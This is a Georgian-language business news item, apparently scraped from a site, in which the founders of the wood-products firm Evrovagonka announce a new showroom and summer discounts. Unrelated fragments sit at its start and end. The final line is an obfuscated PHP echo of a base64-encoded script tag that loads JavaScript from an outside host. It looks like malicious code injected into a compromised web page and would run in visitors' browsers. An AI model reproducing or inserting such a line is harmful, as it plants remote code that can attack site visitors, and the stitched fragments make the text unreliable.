celsiusi
ავერსი საქკაბელი
კომპანია „ევროვაგონკა“ სულ მალე შოურუმს გახსნის, სადაც წარმოდგენილი იქნება ხის მასალების მრავალფეროვანი არჩევანი, – ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME-ს კომპანიის დამფუძნებლებმა მამუკა მაისურაძემ და დავით კოხრეიძემ განუცხადეს.
 
მიუხედავად მსოფლიოში შექმნილი რთული ეკონომიკური პირობებისა, რაც ართულებს ბიზნეს დაგეგმვასა და სტაბილურობას, კომპანია „ევროვაგონკაში“ ფიქრობენ, რომ აუცილებელია  მომხმარებლის ინტერესების გათვალისწინება,  პროდუქტზე კონკურენტული ფასის შენარჩუნება და მომსახურების გამარტივება.
 
 
„ამისთვის შეიქმნა და ოფიციალურად სექტემბერში გაიხსნება ჩვენი შოურუმი, სადაც მომხმარებელი მარტივად შეძლებს დაათვალიეროს და შეარჩიოს ჩვენთან არსებული პოზიციები, როგორიცაა: „ევროვაგონკა“, შტილი, ხის იატაკი, ბლოკჰაუსი, ასევე, კიბის საფეხურები, ხის რიკულები, სხვადასხვა სახის დასამთავრებელ აქსესუარები, რაც გამოიყენება ხის სახლის მშენებლობისას, ავეჯის დაფები, მასიური ხის კარები, კონსტრუქციისათვის საჭირო მშრალი ფიცარი და სხვა.
 
მასალები დამზადებულია სხვადასხვა ჯიშის ხისგან: ნაძვის, ფიჭვის, ლარიქსის, ახლა დავამატეთ არყის ხეც, რომელიც კარგად მუშაობს მკაცრ კლიმატურ პირობებშიც. “– განაცხადა მამუკა მაისურაძემ.
 
 
მან ასევე აღნიშნა, რომ კომპანიას აქვს ძალიან კარგი საზაფხულო აქციები რომელიც მოქმედებს 15– ზე მეტ პოზიციაზე.
 
 
„შოურუმის სახით, ჩვენი მომხმარებლისთვის შევქმენით, კომფორტული, საჭირო, ლამაზი და მიმზიდველი  სივრცე.  რომელიც მორგებულია მთლიანად მომხმარებელზე და გაუმარტივებს მათ მათთვის საჭირო პროდუქტის შეძენის პროცესს. “ – განაცხადა დავით კოხრეიძემ. 
 
ცნობისთვის, შოურუმი მდებარეობს მისამართზე: მექანიზაციის #1.  მეტი ინფორმაციისთვის შეგიძლიათ დარეკოთ ნომერზე – 574 03 20 2 0 და ეწვიოთ ვებგვერდს –   https://evrovagonka.ge/
 
 
 
 
2003
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");